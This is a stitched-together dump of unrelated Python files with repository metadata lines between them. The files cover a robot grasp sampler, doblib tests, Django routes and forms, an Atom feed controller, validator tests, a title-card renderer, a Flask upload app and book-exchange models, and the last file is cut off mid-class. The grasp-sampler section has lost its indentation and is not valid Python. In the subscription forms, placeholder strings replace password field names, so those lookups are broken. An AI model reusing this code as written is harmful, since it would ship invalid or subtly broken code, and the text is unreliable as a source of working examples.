# grasp_conf = None
# sample_q = 4
# stability = 0.0
is_leaf = (len(contact_label[0]) == self._num_levels)
is_goal_sample = (sample_q == 0) and is_leaf
if not is_goal_sample and grasp_conf is not None:
            rospy.logdebug('[HFTSSampler::sample_grasp] Approximate grasp has final quality: %i' % sample_q)
b_approximate_feasible = self._robot.avoid_collision_at_fingers(n_step=20)
if b_approximate_feasible:
grasp_conf = self._robot.GetDOFValues()
open_hand_offset = 0.0
logging.debug('[HFTSSampler::sample_grasp] We sampled a grasp on level ' + str(len(contact_label[0])))
if is_goal_sample:
logging.debug('[HFTSSampler::sample_grasp] We sampled a goal grasp (might be in collision)!')
if is_leaf:
logging.debug('[HFTSSampler::sample_grasp] We sampled a leaf')
if grasp_conf is not None and grasp_pose is not None:
collision_free_arm_ik, arm_conf, pre_grasp_conf = \
self.check_arm_grasp_validity(grasp_conf=grasp_conf,
grasp_pose=grasp_pose,
seed=seed_ik, open_hand_offset=open_hand_offset)
else:
collision_free_arm_ik = False
arm_conf = None
pre_grasp_conf = None
depth = len(contact_label[0])
possible_num_children, possible_num_leaves = self.get_branch_information(depth)
return HFTSNode(labels=contact_label, hand_conf=np.asarray(grasp_conf),
pre_grasp_conf=pre_grasp_conf, arm_conf=arm_conf,
is_goal=is_goal_sample, is_leaf=is_leaf, is_valid=collision_free_arm_ik,
num_possible_children=possible_num_children, num_possible_leaves=possible_num_leaves,
hand_transform=self._robot.GetTransform())
def set_max_iter(self, m):
assert m > 0
self._max_iters = m
def set_parameters(self, max_iters=None, reachability_weight=None,
com_center_weight=None, hfts_generation_params=None,
b_force_new_hfts=None):
# TODO some of these parameters are Robotiq hand specific. We probably wanna pass them as dictionary
if max_iters is not None:
self._max_iters = max_iters
assert self._max_iters > 0
if reachability_weight is not None:
self._reachability_weight = reachability_weight
assert self._reachability_weight >= 0.0
# TODO this is Robotiq hand specific, and outdated
self._hand_manifold.set_parameters(com_center_weight)
if hfts_generation_params is not None:
self._object_io_interface.set_hfts_generation_parameters(hfts_generation_params)
if b_force_new_hfts is not None:
self._b_force_new_hfts = b_force_new_hfts
def shc_evaluation(self, o_tmp, best_o):
if best_o < o_tmp:
return True
else:
return False
def _simulate_grasp(self, grasp_conf, hand_contacts, object_contacts, post_opt=False):
# self.draw_contacts(object_contacts)
self._robot.SetDOFValues(grasp_conf)
try:
T = self._robot.hand_obj_transform(hand_contacts[:3, :3], object_contacts[:, :3])
self._robot.SetTransform(T)
except InvalidTriangleException as ite:
logging.warn('[HFTSSampler::simulate_grasp] Caught an InvalidTriangleException: ' + str(ite))
return False, grasp_conf, None
if post_opt:
self._post_optimization(object_contacts)
open_success, tips_in_contact = self._robot.comply_fingertips()
if not open_success or not tips_in_contact:
return False, self._robot.GetDOFValues(), self._robot.GetTransform()
if self.check_grasp_validity():
return True, self._robot.GetDOFValues(), self._robot.GetTransform()
return False, self._robot.GetDOFValues(), self._robot.GetTransform()
def simulate_grasp(self, grasp_conf, hand_contacts, object_contacts, post_opt=False, swap_contacts=True):
# TODO this method as it is right now is only useful for the Robotiq hand.
b_grasp_valid, grasp_conf, grasp_pose = self._simulate_grasp(grasp_conf, hand_contacts, object_contacts, post_opt)
if not b_grasp_valid and swap_contacts:
self.swap_contacts([0, 1], object_contacts)
b_grasp_valid, grasp_conf, grasp_pose = self._simulate_grasp(grasp_conf, hand_contacts, object_contacts, post_opt)
return b_grasp_valid, grasp_conf, grasp_pose
@staticmethod
def swap_contacts(rows, object_contacts):
frm = rows[0]
to = rows[1]
object_contacts[[frm, to], :] = object_contacts[[to, frm], :]
def reset_robot(self):
shift = transformations.identity_matrix()
shift[0, -1] = 0.2
self._robot.SetTransform(shift)
# Set hand to default (mean) configuration
mean_values = map(lambda min_v, max_v: (min_v + max_v) / 2.0,
self._robot.GetDOFLimits()[0],
self._robot.GetDOFLimits()[1])
self._robot.SetDOFValues(mean_values, range(len(mean_values)))
def pick_new_start_node(self):
num_nodes_top_level = self._branching_factors[0]
contact_label = []
for i in range(self._num_contacts):
contact_label.append([np.random.choice(range(num_nodes_top_level + 1))])
return contact_label
def plot_clusters(self, contact_labels):
if not self._sampler_viewer:
return
self.cloud_plot = []
colors = [np.array((1,0,0)), np.array((0,1,0)), np.array((0,0,1))]
for i in range(3):
label = contact_labels[i]
level = len(label) - 1 # indexed from 0
idx = np.where((self._data_labeled[:, 6:7 + level] == label).all(axis=1))
points = [self._data_labeled[t, 0:3] for t in idx][0]
points = np.asarray(points)
self.cloud_plot.append(self._orEnv.plot3(points=points, pointsize=0.006, colors=colors[i], drawstyle=1))
def _post_optimization(self, grasp_contacts):
logging.info('[HFTSSampler::_post_optimization] Performing post optimization.')
transform = self._robot.GetTransform()
angle, axis, point = transformations.rotation_from_matrix(transform)
# further optimize hand configuration and pose
# TODO this is Robotiq hand specific
transform_params = axis.tolist() + [angle] + transform[:3, 3].tolist()
robot_dofs = self._robot.GetDOFValues().tolist()
def joint_limits_constraint(x, *args):
positions, normals, robot = args
lower_limits, upper_limits = robot.GetDOFLimits()
return -dist_in_range(x[0], [lower_limits[0], upper_limits[0]]) - \
dist_in_range(x[1], [lower_limits[1], upper_limits[1]])
def collision_free_constraint(x, *args):
positions, normals, robot = args
config = [x[0], x[1]]
robot.SetDOFValues(config)
env = robot.GetEnv()
links = robot.get_non_fingertip_links()
for link in links:
if env.CheckCollision(robot.GetLink(link)):
return -1.0
return 0.0
x_min = scipy.optimize.fmin_cobyla(self._post_optimization_obj_fn, robot_dofs + transform_params,
[joint_limits_constraint, collision_free_constraint],
rhobeg=.5, rhoend=1e-3,
args=(grasp_contacts[:, :3], grasp_contacts[:, 3:], self._robot),
maxfun=int(1e8), iprint=0)
self._robot.SetDOFValues(x_min[:2])
axis = x_min[2:5]
angle = x_min[5]
position = x_min[6:]
transform = transformations.rotation_matrix(angle, axis)
transform[:3, 3] = position
self._robot.SetTransform(transform)
@staticmethod
def _post_optimization_obj_fn(x, *params):
# TODO this is Robotiq hand specific
desired_contact_points, desired_contact_normals, robot = params
dofs = x[:2]
robot.SetDOFValues(dofs)
axis = x[2:5]
angle = x[5]
position = x[6:]
transform = transformations.rotation_matrix(angle, axis)
transform[:3, 3] = position
robot.SetTransform(transform)
contacts = robot.get_tip_pn()
temp_positions = contacts[:, :3]
temp_normals = contacts[:, 3:]
pos_err = position_distance(desired_contact_points, temp_positions)
normal_err = normal_distance(desired_contact_normals, temp_normals)
return pos_err + normal_err
class HFTSNode:
def __init__(self, labels=None, hand_conf=None, hand_transform=None,
pre_grasp_conf=None, arm_conf=None, is_leaf=False, is_valid=False, is_goal=False,
num_possible_children=0, num_possible_leaves=0, quality=0.0):
# None values represent the root node
if labels is None:
self._depth = 0
else:
self._depth = len(labels[0])
self._labels = labels
self._hand_config = hand_conf
self._hand_transform = hand_transform
self._is_goal = is_goal
self._is_leaf = is_leaf
self._is_valid = is_valid
self._pre_grasp_conf = pre_grasp_conf
self._arm_conf = arm_conf
self._num_possible_children = num_possible_children
self._num_possible_leaves = num_possible_leaves
self._quality = quality
def get_labels(self):
return self._labels
def get_depth(self):
return self._depth
def get_hand_config(self):
return self._hand_config
def get_pre_grasp_config(self):
return self._pre_grasp_conf
def is_goal(self):
return self._is_goal
def get_hand_transform(self):
return self._hand_transform
def get_arm_configuration(self):
return self._arm_conf
def get_unique_label(self):
if self._labels is None:
return 'root'
label = []
for finger_label in self._labels:
label.extend(finger_label)
return str(label)
def is_extendible(self):
return not self._is_leaf
def is_leaf(self):
return self._is_leaf
def is_valid(self):
return self._is_valid
def get_num_possible_children(self):
return self._num_possible_children
def get_num_possible_leaves(self):
return self._num_possible_leaves
def get_quality(self):
return self._quality
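# Driver sketch (illustrative, not part of the original module): descending the
# HFTS hierarchy by repeated sampling until a valid goal grasp is found. The
# hand/cache file names and the object id are hypothetical placeholders.
def _example_hfts_descent(object_io_interface):
    sampler = HFTSSampler(object_io_interface, verbose=True)
    sampler.load_hand(hand_file='robotiq.xml', hand_cache_file='robotiq.cache')
    sampler.load_object('target_object')
    node = sampler.get_root_node()
    while node.is_extendible():
        node = sampler.sample_grasp(node, depth_limit=1)
        if node.is_goal() and node.is_valid():
            return node  # collision-free goal grasp
    return node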
| 2.09375
| 2
|
tests/test_bootstrap.py
|
initOS/dob-lib
| 0
|
12782912
|
# © 2021 <NAME> (initOS GmbH)
# License Apache-2.0 (http://www.apache.org/licenses/).
import os
from queue import Empty
from unittest import mock
import pytest
from doblib.bootstrap import BootstrapEnvironment, aggregate_repo
def aggregate_exception(repo, args, sem, err_queue):
try:
err_queue.put_nowait("ERROR")
finally:
sem.release()
@pytest.fixture
def env():
cur = os.getcwd()
os.chdir("tests/environment/")
env = BootstrapEnvironment("odoo.local.yaml")
os.chdir(cur)
return env
def test_init(env):
env.generate_config = mock.MagicMock()
env._bootstrap = mock.MagicMock()
env.init(["--no-config"])
env.generate_config.assert_not_called()
env._bootstrap.assert_called_once()
env._bootstrap.reset_mock()
env.init()
env.generate_config.assert_called_once()
env._bootstrap.assert_called_once()
@mock.patch("doblib.bootstrap.match_dir", return_value=False)
def test_aggregate_repo(match_mock):
m = mock.MagicMock()
aggregate_repo(m, m, m, m)
m.put_nowait.assert_not_called()
m.release.assert_called_once()
match_mock.assert_called_once_with(m.cwd, m.dirmatch)
m.aggregate.assert_not_called()
m.reset_mock()
match_mock.return_value = True
aggregate_repo(m, m, m, m)
m.put_nowait.assert_not_called()
m.release.assert_called_once()
m.aggregate.assert_called()
m.reset_mock()
match_mock.side_effect = Exception()
aggregate_repo(m, m, m, m)
m.put_nowait.assert_called()
m.release.assert_called_once()
m.aggregate.assert_not_called()
@mock.patch("doblib.bootstrap.traceback")
@mock.patch("doblib.bootstrap.Repo")
@mock.patch("doblib.bootstrap.aggregate_repo")
@mock.patch("doblib.bootstrap.get_repos", return_value=[{"cwd": "unknown"}])
def test_bootstrap(repos, aggregate, repo, traceback, env):
env.generate_config = mock.MagicMock()
assert not env.init()
repos.assert_called_once()
repo.assert_called()
aggregate.assert_called()
aggregate.reset_mock()
env.init(["-j", "1"])
aggregate.assert_called()
with mock.patch("doblib.bootstrap.Queue") as m:
queue = m.return_value
queue.empty.return_value = False
queue.get_nowait.side_effect = [(1, 42, 37), Empty()]
assert env.init() == 1
queue.empty.assert_called()
queue.get_nowait.assert_called()
traceback.print_exception.assert_called_once_with(1, 42, 37)
| 2.125
| 2
|
api/urls.py
|
horbenko/web
| 0
|
12782913
|
from django.conf.urls import url
from django.http import HttpResponseRedirect
from .views import PostCreate, PostUpdate, PostDelete, ProfileView
app_name = 'api'
urlpatterns = [
url(r'^$', lambda r: HttpResponseRedirect('new/'), name='index'),
url(r'^(?P<pk>[0-9]+)/$', PostUpdate.as_view(), name='update'),
url(r'^new/$', PostCreate.as_view(), name='create'),
url(r'^(?P<pk>[0-9]+)/delete/$', PostDelete.as_view(), name='delete'),
# API
url(r'^profile/$', ProfileView.as_view(), name='profile'),
]
| 1.796875
| 2
|
spreedly/forms.py
|
guitarparty/django-spreedly
| 2
|
12782914
|
import uuid
from django import forms
from django.conf import settings
from django.core.mail import send_mail
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from spreedly.models import Plan, Gift, Subscription
from spreedly.functions import subscription_url, check_trial_eligibility, return_url
import spreedly.settings as spreedly_settings
from spreedly.pyspreedly.api import Client
class SubscribeForm(forms.Form):
username = forms.CharField(
max_length=30,
required=True
)
email = forms.EmailField(
required=True
)
password1 = forms.CharField(
label="Password",
required=True,
widget=forms.PasswordInput(),
)
password2 = forms.CharField(
label="Password again",
required=True,
widget=forms.PasswordInput(),
)
subscription = forms.ModelChoiceField(queryset=Plan.objects.filter(enabled=True), empty_label=None)
def clean(self):
username = self.cleaned_data.get("username")
email = self.cleaned_data.get("email")
pass1 = self.cleaned_data.get("password1")
pass2 = self.cleaned_data.get("<PASSWORD>")
plan = self.cleaned_data.get("subscription")
if username and email and pass1 and pass2:
if pass1 != pass2:
raise forms.ValidationError(_("You must type the same password each time."))
if plan.is_free_trial_plan:
existing_users = Subscription.objects.filter(user__email=email, trial_elegible=False).count()
if existing_users:
raise forms.ValidationError(_("A user with this email has already had a free trial."))
user, created = User.objects.get_or_create(username=username.lower(), defaults={
'email': email,
'is_active': False
})
if not created and user.is_active:
raise forms.ValidationError(_("Sorry, This username is already taken."))
elif not created:
user.email = email
user.save()
return self.cleaned_data
def save(self):
user = User.objects.get(username=self.cleaned_data["username"].lower())
user.set_password(self.cleaned_data["password2"])
user.save()
plan = self.cleaned_data["subscription"]
trial = check_trial_eligibility(plan, user)
if trial:
url = return_url(plan.pk, user, trial=True)
else:
url = subscription_url(plan, user)
send_mail(
spreedly_settings.SPREEDLY_CONFIRM_EMAIL_SUBJECT,
render_to_string(spreedly_settings.SPREEDLY_CONFIRM_EMAIL, {
'plan_name': plan.name,
'user': user,
'site': spreedly_settings.SPREEDLY_SITE_URL,
'spreedly_url': url
}),
settings.DEFAULT_FROM_EMAIL,
[user.email,]
)
return reverse('spreedly_email_sent', args=[user.id])
class GiftRegisterForm(forms.Form):
username = forms.CharField(
max_length=30,
required=True
)
email = forms.EmailField(
required=True
)
password1 = forms.CharField(
label="Password",
required=True,
widget=forms.PasswordInput(),
)
password2 = forms.CharField(
label="<PASSWORD>",
required=True,
widget=forms.PasswordInput(),
)
gift_key = forms.CharField(max_length=32, required=True, widget=forms.HiddenInput)
def clean(self):
username = self.cleaned_data.get("username")
email = self.cleaned_data.get("email")
pass1 = self.cleaned_data.get("password1")
pass2 = self.cleaned_data.get("<PASSWORD>")
gift_key = self.cleaned_data.get("gift_key")
if username:
try:
User.objects.get(username=self.cleaned_data['username'], is_active=True)
raise forms.ValidationError(_("Sorry, This username is already taken."))
except User.DoesNotExist:
pass
if username and email and pass1 and pass2:
if pass1 != pass2:
raise forms.ValidationError(_("You must type the same password each time."))
return self.cleaned_data
def save(self):
# remove any inactive users with this same username
try:
old_user = User.objects.get(username=self.cleaned_data['username'], is_active=False)
old_user.delete()
except User.DoesNotExist:
pass
gift = Gift.objects.get(uuid=self.cleaned_data["gift_key"])
user = gift.to_user
user.username = self.cleaned_data['username']
user.email = self.cleaned_data['email']
        user.set_password(self.cleaned_data['password2'])
user.is_active=True
user.save()
#update spreedly info
client = Client(settings.SPREEDLY_AUTH_TOKEN, settings.SPREEDLY_SITE_NAME)
client.set_info(user.pk, email=user.email, screen_name=user.username)
gift.delete()
return user
class GiftForm(forms.Form):
subscription = forms.ModelChoiceField(queryset=Plan.objects.filter(plan_type='gift'), empty_label=None)
your_name = forms.CharField(
label="Your Name",
required=True
)
message = forms.CharField(
label="Message",
required=False,
widget=forms.Textarea(attrs={'rows':3, 'cols':55})
)
email = forms.EmailField(
label="Email",
required=True
)
email_again = forms.EmailField(
label="Email Again",
required=True
)
def clean(self):
email = self.cleaned_data.get("email")
email2 = self.cleaned_data.get("email_again")
if email and email2:
if email != email2:
raise forms.ValidationError(_("The two emails don't match. Please make sure both are correct."))
return self.cleaned_data
def save(self, request):
gift_id = str(uuid.uuid4().hex)[:29]
plan = self.cleaned_data["subscription"]
user = User.objects.create(
username=gift_id,
email=self.cleaned_data["email"],
is_active=False,
password='<PASSWORD>'
)
Gift.objects.create(
from_user=request.user,
to_user=user,
uuid = gift_id,
plan_name=plan.name,
message=self.cleaned_data["message"]
)
return (plan, user)
class PlanModelChoiceField(forms.ModelChoiceField):
def label_from_instance(self, obj):
if obj.enabled:
return unicode(obj)
else:
return '*%s' % (obj)
class AdminGiftForm(forms.Form):
plan_name = forms.CharField(
label="Plan Name",
required=True
)
feature_level = forms.ChoiceField(
label="Feature Level",
choices=[(x,x) for x in set(Plan.objects.values_list('feature_level', flat=True))]
)
time = forms.ChoiceField(
label="Time",
choices=[(i,i) for i in range(1,91)]
)
units = forms.ChoiceField(
label="Time Units",
choices=[
('days', 'Day(s)'),
('months', 'Month(s)')
]
)
your_name = forms.CharField(
label="Your Name",
required=True
)
message = forms.CharField(
label="Message",
required=False,
widget=forms.Textarea(attrs={'rows':3, 'cols':55})
)
email = forms.EmailField(
label="Email",
required=True
)
def save(self, request):
gift_id = str(uuid.uuid4().hex)[:29]
user = User.objects.create(
username=gift_id,
email=self.cleaned_data["email"],
is_active=False,
password='<PASSWORD>'
)
Gift.objects.create(
from_user=request.user,
to_user=user,
uuid = gift_id,
message=self.cleaned_data["message"],
plan_name=self.cleaned_data["plan_name"]
)
return user
| 2.265625
| 2
|
controllers/feed.py
|
Dans-labs/shebanq
| 24
|
12782915
|
from textwrap import dedent
from markdown import markdown
from helpers import hEsc, sanitize, isodt
from urls import Urls
from queryrecent import QUERYRECENT
def atom():
"""Serves an RSS feed of recently saved shared queries.
See also [M:QUERYRECENT][queryrecent.QUERYRECENT].
"""
session.forget(response)
U = Urls()
QueryRecent = QUERYRECENT()
queries = QueryRecent.feed()
icon = URL("static", "images/shebanq_logo_xxsmall.png", host=True)
cover = URL("static", "images/shebanq_cover.png", host=True)
base = URL("xxx", "yyy", host=True, extension="")[0:-8]
feed = URL("feed", "atom", host=True, extension="")
xml = []
xml.append(
"""<?xml version="1.0" encoding="utf-8"?>
"""
)
xml.append(
dedent(
"""
<feed
xmlns="http://www.w3.org/2005/Atom"
xmlns:webfeeds="http://webfeeds.org/rss/1.0"
>
"""
)
)
xml.append(
dedent(
f"""
<title>SHEBANQ</title>
<subtitle>Shared queries, recently executed</subtitle>
<link href="{hEsc(feed)}" rel="self"
title="SHEBANQ - Shared Queries" type="application/atom+xml"/>
<link href="{hEsc(base)}" rel="alternate" type="text/html"/>
<id>{hEsc(base + "/hebrew/queries")}</id>
<updated>{isodt()}</updated>
<category term="bible study"/>
<category term="biblical studies"/>
<category term="text"/>
<category term="linguistic"/>
<category term="hebrew"/>
<category term="bible"/>
<category term="query"/>
<category term="database"/>
<category term="research"/>
<category term="scholar"/>
<category term="annotation"/>
<category term="digital bible"/>
<category term="digital"/>
<category term="religion"/>
<category term="theology"/>
<icon>{hEsc(icon)}</icon>
<webfeeds:icon>{hEsc(icon)}</webfeeds:icon>
<logo>{hEsc(cover)}</logo>
<webfeeds:cover image="{hEsc(cover)}"/>
<webfeeds:accentColor>DDBB00</webfeeds:accentColor>
"""
)
)
for (
query_id,
first_name,
last_name,
query_name,
description,
qvid,
qexe,
qver,
) in queries:
descHtml = U.specialLinks(
sanitize(
markdown(
hEsc(description or "No description given"), output_format="xhtml5"
)
)
)
# we add a standard cover image if the description does not contain any image
standardImage = (
f"""<p><img src="{cover}"/></p>""" if "<img " not in descHtml else ""
)
href = hEsc(
URL(
"hebrew",
"query",
vars=dict(id=query_id, version=qver),
host=True,
extension="",
)
)
tag = f"tag:shebanq.ancient-data.org,2016-01-01:{query_id}/{qvid}/{qver}"
name = hEsc(f"{first_name} {last_name}")
xml.append(
dedent(
f"""
<entry>
<title>{hEsc(query_name)}</title>
<link href="{href}" rel="alternate" type="text/html"/>
<id>{tag}</id>
<updated>{isodt(qexe)}</updated>
<category term="query"/>
<content type="xhtml">
<div xmlns="http://www.w3.org/1999/xhtml">
{standardImage}
{descHtml}
</div>
</content>
<author><name>{name}</name></author>
</entry>
"""
)
)
xml.append(
dedent(
"""
</feed>
"""
)
)
return dict(xml="".join(xml))
| 2.703125
| 3
|
tests/lupin/validators/test_in.py
|
Clustaar/lupin
| 22
|
12782916
|
import pytest
from lupin.errors import InvalidIn
from lupin.validators import In
@pytest.fixture
def validator():
return In({1, 2, 3})
class TestCall(object):
def test_raise_error_if_invalid_value(self, validator):
with pytest.raises(InvalidIn):
validator(4, [])
def test_does_nothing_if_valid_value(self, validator):
validator(1, [])
| 2.515625
| 3
|
rsvp_language/rsvp_language_protocol/langexpy_script/order.py
|
thomasbazeille/public_protocols
| 3
|
12782917
|
# -*- coding: utf-8 -*-
import os
import csv
import dirfiles
def trial_order(order_directory):
"""
Reads a specific trial order for n blocks from n csv files and
returns n lists to be used by the object block_list.order_trials()
of Expyriment library
"""
# Define the pathway of the inputs directory
order_path = os.path.abspath(order_directory)
# List csv files with sequence order of the inputs
order_filenames = dirfiles.listdir_csvnohidden(order_path)
order_filenames.sort()
# Read csv files
order_list = [[i for i in csv.reader(open(order_filename))]
for order_filename in order_filenames]
# Remove headers of each block lists
for i in range(len(order_list)):
order_list[i].pop(0)
# Extract the sequence from the second column of the block lists
norder_list = [[order_list[i][j][1] for j in range(len(order_list[i]))]
for i in range(len(order_list))]
# Convert "string" into "int" elements
norder_list = [map(int, norder_list[k]) for k in range(len(norder_list))]
# Return final sequence of trials for every block
return norder_list
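# Usage sketch (illustrative): 'order_csv' is a hypothetical directory holding
# one csv file per block, each with a header row and the trial sequence in its
# second column.
if __name__ == '__main__':
    for block_index, block in enumerate(trial_order('order_csv')):
        print('block %d: %s' % (block_index, list(block)))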
| 3.453125
| 3
|
examples/render_test.py
|
markreidvfx/pct_titles
| 0
|
12782918
|
import pct_titles
import os
import cythonmagick
from StringIO import StringIO
def escape(s):
    s = s.replace("&", "&amp;")
    s = s.replace("<", "&lt;")
    s = s.replace(">", "&gt;")
    s = s.replace('"', "&quot;")
    s = s.replace("'", "&apos;")
    return s
def convert_color(c, alpha):
a = 1.0 - (alpha / 100.0)
r = c[0] / 65535.0
g = c[1] / 65535.0
b = c[2] / 65535.0
c = '#%04X%04X%04X%04X' % ( int(r*65535.0), int(g*65535.0), int(b*65535.0),
int(a*65535.0))
return c
def render_item(pct, img, item ,out_dir):
bbox = item.bbox
img.fill_color = 'white'
img.stroke_color = 'white'
min_x = min(bbox[1], bbox[3])
min_y = min(bbox[0], bbox[2])
max_x = max(bbox[1], bbox[3])
max_y = max(bbox[0], bbox[2])
width = max_x - min_x
height = max_y - min_y
rad_x = width/2.0
rad_y = height/2.0
origin_x = min_x + rad_x
origin_y = min_y + rad_y
fill_color = convert_color(item.fill_color, item.fill_alpha)
stroke_color = convert_color(item.border_color, item.border_alpha)
shadow_color = convert_color(item.shadow_color, item.shadow_alpha)
img.fill_color = fill_color
img.stroke_width = item.border_width
img.stroke_color = stroke_color
if item.border_width:
img.stroke_color = stroke_color
else:
img.stroke_color = fill_color
if isinstance(item, pct_titles.TitleLine):
img.stroke_width = item.line_width
img.stroke_color = 'white'
line = cythonmagick.Line(bbox[1], bbox[0], bbox[3], bbox[2])
img.draw([line])
elif isinstance(item, pct_titles.TitleRectangle):
roundness = item.corner_roundness / 2.0
rect = cythonmagick.RoundRectangle(min_x, min_y, max_x, max_y, roundness,roundness)
img.draw([rect])
elif isinstance(item, pct_titles.TitleOval):
origin_x = min_x + rad_x
origin_y = min_y + rad_y
oval = cythonmagick.Ellipse(origin_x, origin_y, rad_x, rad_y, 0, 360)
img.draw([oval])
elif isinstance(item, pct_titles.TitleText):
font_size = item.text_formating[0].font_size
font_id = item.text_formating[0].font_id
font_style_id = item.text_formating[0].style
font = pct.title_page.fonts[font_id].replace(" ", '-')
style = 'normal'
if font_style_id in (0x0200, 0x0300):
style = 'italic'
caption_size = "%dx%d" % (width, 0) # zero for auto height
caption = cythonmagick.Image(size=caption_size)
caption.font = font
caption.density = "72x72"
caption.font_point_size = font_size
caption.background = 'none'
caption.fill_color = fill_color
caption.stroke_width = item.border_width
caption.stroke_color = stroke_color
caption.font_style = style
# bold
if font_style_id in (0x0100, 0x0300):
caption.font_weight = 1
else:
caption.font_weight = 0
text = item.text
caption.read("caption:{text}".format(text=text))
grow = 200
original_size = caption.size()
caption.extent("%dx%d!" % (width+grow, height+grow), 'center')
offset_x = min_x - (caption.size().width - original_size.width) / 2
offset_y = min_y - (caption.size().height - original_size.height) / 2
position = cythonmagick.Geometry(0, 0, offset_x, offset_y)
if item.shadow_depth or item.shadow_blur:
alpha = caption.channel("alpha")
alpha.negate()
# alpha.write(os.path.join(out_dir, "alpha.png"))
shadow = cythonmagick.Image(size=alpha.size(), color=shadow_color)
shadow.composite(alpha, compose = "copyopacity")
if item.shadow_blur:
shadow.blur(1, item.shadow_blur)
shadow_pos = cythonmagick.Geometry(0, 0, offset_x + item.shadow_dir[1], offset_y + item.shadow_dir[0])
shadow.artifacts["compose:args"] = "%d" % (100-item.shadow_alpha)
img.composite(shadow, "dissolve", shadow_pos)
img.composite(caption, "over", position,)
def render_pct(src, dst):
pct = pct_titles.PctFile()
pct.read(src)
size = "865x485" # this seems to be the base resolution
img = cythonmagick.Image(size=size, color="grey")
#convert -list font
for i, item in enumerate(pct.elements):
render_item(pct, img, item, os.path.dirname(dst))
img.resize("720x486!")
name, ext = os.path.splitext(dst)
if ext and ext.lower() in (".pict", '.pct',):
img.magick = 'pict'
data = StringIO(img.tostring())
f = open(dst, 'wb')
pct.embed(data, f)
else:
img.write(dst)
if __name__ == "__main__":
from optparse import OptionParser
parser = OptionParser()
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error("not enough args")
render_pct(args[0], args[1])
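# Usage sketch (assumption): render a PICT title file to a preview image,
#   python render_test.py title.pct preview.png
# A .pct/.pict destination instead embeds the rendered frame back into a PICT
# container via pct.embed().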
| 2.34375
| 2
|
website/hello.py
|
simonra/Distributed_Raspberry-Pi_Computing
| 0
|
12782919
|
import os
from flask import Flask, request, redirect, url_for, render_template, send_from_directory
from werkzeug import secure_filename
UPLOAD_FOLDER = 'uploads/'
ALLOWED_EXTENSIONS = set(['m'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16*1024*1024
def allowed_file(filename):
return '.' in filename and filename.rsplit('.',1)[1] in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET','POST'])
def upload_file():
if request.method == 'POST':
file = request.files['file']
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return redirect(url_for('uploaded_file' , filename=filename))
return render_template('index.html')
@app.route('/uploads/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
if __name__ == '__main__':
app.run(debug=True)
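# Usage sketch (assumption): exercising the endpoints with the 'requests'
# library; 'solver.m' is a hypothetical file matching ALLOWED_EXTENSIONS.
def _example_upload():
    import requests
    with open('solver.m', 'rb') as fh:
        requests.post('http://127.0.0.1:5000/', files={'file': fh})
    return requests.get('http://127.0.0.1:5000/uploads/solver.m').text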
| 2.53125
| 3
|
polybookexchange/models.py
|
maltherd/polybookexchange
| 0
|
12782920
|
from django.db import models
from django.db.models import Min
import requests
import isbnlib
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
from django.templatetags.static import static
from django.conf import settings
import datetime
from django.utils.timezone import now
class Book(models.Model):
isbn = models.DecimalField(primary_key=True, max_digits=13, decimal_places=0)
title = models.CharField(max_length=255)
original_title = models.CharField(max_length=255)
edition = models.PositiveSmallIntegerField()
year = models.PositiveIntegerField()
avg_price = models.FloatField(default=0, blank=True, null=True)
qty_in_stock = models.IntegerField(default=0)
qty_sold = models.IntegerField(default=0)
publisher = models.ForeignKey('Publisher')
author = models.ManyToManyField('Author')
    cover = models.ImageField(upload_to='polybookexchange/covers')
def sellable(self):
return self.exemplar_set.filter(buyer_id=None).order_by('pk').all()
def sold(self):
return self.exemplar_set.exclude(buyer_id=None).order_by('pk').all()
def used_in_sections(self):
return Section.objects.filter(usedby__book__pk=self.pk).distinct().order_by('pk').all()
def used_in_semesters(self):
return Semester.objects.filter(usedby__book__pk=self.pk).distinct().order_by('pk').all()
def update_metadata(self):
try:
data = isbnlib.meta(str(self.isbn), 'wcat')
self.title = data.get('Title')
self.year = data.get('Year') or 1900
            self.publisher, _ = Publisher.objects.get_or_create(name=data.get('Publisher', 'Unknown'))
self.author.clear()
for author in data.get('Authors', []):
for splited_author in author.split(', '):
author_object, _ = Author.objects.get_or_create(name=splited_author)
self.author.add(author_object)
except:
self.title = self.title or '?'
self.year = self.year or 1900
            try:
                _ = self.publisher  # check whether a publisher is already set
            except:
                self.publisher, _ = Publisher.objects.get_or_create(name='Unknown')
self.save()
def update_cover(self):
image = requests.get('http://images.amazon.com/images/P/%s.01._SS500_SCLZZZZZZZ_.jpg' % (isbnlib.to_isbn10(str(self.isbn)), ))
if image.status_code == 200 and len(image.content) > 50:
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(image.content)
img_temp.flush()
self.cover.save('%s.jpg' % (self.isbn,), File(img_temp))
else:
self.cover.delete()
def get_current_cover(self):
if self.cover:
return settings.MEDIA_URL + self.cover.name
return static('polybookexchange/default.png')
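# Usage sketch (illustrative, not part of the original module): refreshing a
# stored Book from the external sources used above; the ISBN is a placeholder.
def _example_refresh_book(isbn=9780132350884):
    book = Book.objects.get(isbn=isbn)
    book.update_metadata()  # title/year/publisher/authors via isbnlib
    book.update_cover()     # cover image fetched from Amazon
    return book.get_current_cover()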
class Candidate(models.Model):
STATE_CHOICES = (
(u'neuf', u'neuf'),
(u'bon', u'bon'),
(u'acceptable', u'acceptable'),
(u'mauvais', u'mauvais'),
)
isbn = models.DecimalField(max_digits=13, decimal_places=0)
sciper = models.PositiveIntegerField()
annotated = models.BooleanField()
highlighted = models.BooleanField()
state = models.CharField(max_length=10, choices=STATE_CHOICES)
comments = models.TextField()
price = models.FloatField()
creation_date = models.DateTimeField(auto_now_add=True)
def days_left(self):
diff = (self.creation_date + datetime.timedelta(days=16) - now()).days
if diff < 0:
diff = 0
return diff
def days_left_percent(self):
return int(((15 - self.days_left()) * 100.0) / 15.0)
def days_left_color(self):
if self.days_left() < 1:
return 'danger'
if self.days_left() < 5:
return 'warning'
return 'success'
class CandidateUsage(models.Model):
candidate = models.ForeignKey('Candidate')
section = models.ForeignKey('Section')
semester = models.ForeignKey('Semester')
class Exemplar(models.Model):
STATE_CHOICES = (
